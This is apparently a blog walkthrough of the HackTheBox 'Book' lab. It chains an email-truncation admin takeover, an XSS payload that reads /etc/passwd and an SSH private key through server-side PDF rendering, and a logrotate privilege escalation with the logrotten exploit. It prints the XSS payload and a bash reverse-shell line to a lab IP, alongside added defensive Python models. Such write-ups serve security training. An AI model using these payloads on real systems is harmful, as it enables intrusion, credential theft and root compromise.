14. HackTheBox. Level Medium: Book Walkthrough. XSS to LFI via PDF and LPE via Logrotate

17 December 2024 6 minutes Author: Lady Liberty

We take a detailed look at the HackTheBox Book task. The focus is on XSS vulnerabilities and their escalation to LFI via PDF, as well as privilege escalation (LPE) using Logrotate. The material contains a step-by-step analysis of the attack process: from detecting cross-site scripting (XSS) to further exploiting vulnerabilities for local file inclusion (LFI). In addition, the method of privilege escalation due to incorrect Logrotate configuration is described. This article will be useful for cybersecurity professionals, pentesters, and anyone interested in security vulnerabilities and HackTheBox training tasks. It will help to understand the complex processes of exploitation with real-world examples and steps.

Step-by-step instructions

This article discusses exploiting an XSS vulnerability for LFI via PDF, privilege escalation using logrotten, and the login bypass caused by server-side field truncation.

The lab is connected via VPN. For security reasons, it is not recommended to use a work computer or device with sensitive data, as the connection is to a private network where experienced information security professionals are present.

Recon

This machine has the IP address 10.10.10.176, which we add to /etc/hosts.

10.10.10.176	book.htb

First, a scan of open ports is performed. To speed up the process, masscan is used instead of the lengthy nmap scan. The scan covers all TCP and UDP ports via the tun0 interface at a rate of 500 packets per second.

masscan -e tun0 -p1-65535,U:1-65535 10.10.10.176 --rate=500

Now, to get more detailed information about the services running on the ports, let’s run the scan with the -A option.

nmap -A book.htb -p22,80

The host is running SSH and a web server. Let’s start with the web server. We are greeted by a login and registration page.

Let’s register and log in.

The site is a library with the ability to add a book and contact the administrator.

No attack vectors were found in these fields, but the administrator’s email is now known. For further investigation, directory enumeration is performed using gobuster. The tool parameters specify the number of threads (128, -t), the target URL (-u), the wordlist (-w), and the file extensions to try (-x).

gobuster dir -t 128 -u http://book.htb/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x html,php

As a result of the search, a number of interesting pages were identified, including the administrative panel. After that, the authorization form was analyzed, and potentially interesting information was discovered in the page source code.

Usernames are limited to 10 characters and email addresses are limited to 20 characters. However, the check is only performed for empty fields and the length of the data is not controlled.

Entry Point

There is a possibility that the entered data will be truncated to the specified length on the server. To check this, a user registers with an email address that is longer than 20 characters.

We log in using the truncated address.

As expected, the assumption turned out to be correct: the user with the email address “[email protected] 123” is registered successfully. Logging in with the truncated address then gives access as the administrator.

This attack works because, when checking the value “[email protected] 123”, the system does not find it in the database; the entered value is then truncated on insertion and overwrites the existing record. After a successful login, the site is examined again, but nothing interesting is found apart from the collection.
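To make the mechanism concrete, here is an added example (not code from the original post) modelling the registration flaw described above next to a hardened version. The 20-character limit is taken from the page; the account names, the password values and the trailing-space-insensitive comparison are constructed assumptions.

```python
"""Model of a registration flow where the uniqueness check runs on the raw
input while the stored value is silently truncated to the column width.
All accounts and addresses below are constructed for the example."""
EMAIL_MAX = 20                        # column width stated on the page
ADMIN_EMAIL = "admin@example.test"    # constructed stand-in for the real admin


def column_truncate(value):
    """Mimic a VARCHAR(20) column: cut to 20 chars; trailing spaces are
    ignored on comparison (assumed PAD-SPACE style collation)."""
    return value[:EMAIL_MAX].rstrip()


class UserStore:
    """Accounts keyed by email; the admin panel trusts the address alone."""

    def __init__(self):
        self.users = {ADMIN_EMAIL: "correct-horse"}     # legitimate admin

    def register_vulnerable(self, email, password):
        # The existence check runs on the full, untruncated value ...
        if email in self.users:
            return "exists"
        # ... but the stored key is cut to the column width, so a padded
        # "admin@example.test      123" collapses onto the admin's record
        # and replaces its password with the attacker's.
        self.users[column_truncate(email)] = password
        return "created"

    def register_hardened(self, email, password):
        # Normalise first, enforce the length server-side, then check
        # existence on exactly the value that will be stored.
        email = email.strip().lower()
        if not email or len(email) > EMAIL_MAX:
            return "rejected"
        if email in self.users:
            return "exists"
        self.users[email] = password
        return "created"

    def login(self, email, password):
        """Return the role for valid credentials, otherwise None."""
        if self.users.get(email) != password:
            return None
        return "admin" if email == ADMIN_EMAIL else "user"
```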

After downloading and opening PDF documents, we will find a list of registered users and collections.

USER

Experience suggests that when information is uploaded to a server and displayed in a PDF, it is worth checking for the possibility of an XSS to LFI attack. This can be tested by uploading the following code to the server:

<script>
x=new XMLHttpRequest;
x.onload=function(){
document.write(this.responseText)
};
x.open("GET","file:///etc/passwd");
x.send();
</script>

Let’s log in as a regular user and add a file to the collection, specifying this payload in all fields.

Now we download the file with the collection from the administrator, and find the contents of the /etc/passwd file there.

Let’s read the private SSH key of the reader user by specifying the file “file:///home/reader/.ssh/id_rsa” in the payload.

When copying the key from a PDF file, it appears to be incomplete. To resolve this issue, open the file in a browser, then manually copy the key text and paste it into a regular text file. Be sure to highlight the first and last lines of the key.

Let’s assign permissions to this file.

chmod 0600 reader.key

And we connect via SSH.

ROOT

There is a backups folder in the user’s home directory.

Examining it did not yield anything useful. After running the basic system enumeration scripts, nothing useful can be found either. In such a situation, you should check the tasks running on the system using pspy64. During analysis, it turns out that logrotate is running with root privileges.

The Logrotate utility is used to automate log processing, allowing various actions to be performed based on specified conditions and rules. For example, logs can be compressed into an archive, deleted, or sent to another server after reaching a certain size, age, or other parameters.

A Google search immediately yields useful information about potential vulnerabilities and exploits in Logrotate, especially when run as root.
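From the defender's side, the misconfiguration this relies on can be audited. The following is an added example (not code from the original post or from the logrotten project) that scans logrotate stanzas for a log rotated as root with the default 'create' whose directory tree a non-root user can modify; the stanza syntax is the usual 'path { directive ... }', and the stat callable is injectable so the check also runs against constructed metadata.

```python
"""Audit logrotate stanzas for logs in a non-root-writable directory tree
that are rotated with the default 'create' action (the logrotten precondition).
stat_fn defaults to os.stat; fake_stat() builds constructed metadata."""
import os
import re
import stat
from types import SimpleNamespace

STANZA_RE = re.compile(r"([^\s{}]+(?:[ \t]+[^\s{}]+)*)\s*\{([^}]*)\}")


def parse_stanzas(config_text):
    """Yield (log_path, directive_names) for every path in every stanza."""
    for m in STANZA_RE.finditer(config_text):
        directives = {ln.split()[0] for ln in m.group(2).splitlines()
                      if ln.strip() and not ln.lstrip().startswith("#")}
        for path in m.group(1).split():
            yield path, directives


def dir_writable_by_non_root(st):
    """True if someone other than root can rename or create entries here."""
    mode = st.st_mode
    return ((st.st_uid != 0 and bool(mode & stat.S_IWUSR))
            or (st.st_gid != 0 and bool(mode & stat.S_IWGRP))
            or bool(mode & stat.S_IWOTH))


def risky_logs(config_text, stat_fn=os.stat):
    """Paths rotated as root with 'create' inside a non-root-writable tree.
    'copytruncate' keeps the original inode and 'su' drops privileges,
    so stanzas carrying either directive are skipped."""
    findings = []
    for path, directives in parse_stanzas(config_text):
        if directives & {"copytruncate", "su"}:
            continue
        d = os.path.dirname(path) or "/"
        while True:                      # walk from the log's dir up to /
            if dir_writable_by_non_root(stat_fn(d)):
                findings.append(path)
                break
            parent = os.path.dirname(d)
            if parent == d:
                break
            d = parent
    return findings


def fake_stat(uid, gid, mode):
    """Constructed stand-in for os.stat_result, for offline checks."""
    return SimpleNamespace(st_uid=uid, st_gid=gid, st_mode=mode)
```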

We download the repository and compile the program.

gcc -o logrotten logrotten.c

Now let’s create a file with a reverse shell.

echo "bash -i >& /dev/tcp/10.10.15.60/4321 0>&1" > payloadfile

Logrotten is launched, and in another terminal window data is written to the target log file. This triggers a rotation by Logrotate, which runs with root privileges, opening the way to exploiting the vulnerability.

./logrotten -p ./payloadfile /home/reader/backups/access.log

The program worked successfully.

After a few seconds, a connection appears and lasts long enough for further actions. This time is more than enough to access the private SSH key and view its contents.

Using the obtained private SSH key, a connection is made to the target system as root. After successful authentication, all that remains is to find and read the flag.

Conclusion

This article demonstrated a step-by-step exploitation chain, from XSS to LFI via PDF, to gaining access to the system and escalating privileges using Logrotate. The key steps were: discovering the login form’s length restrictions, exploiting the XSS to read a private SSH key, and analyzing automated system tasks using pspy64. This allowed access to the system and the final flag to be taken.
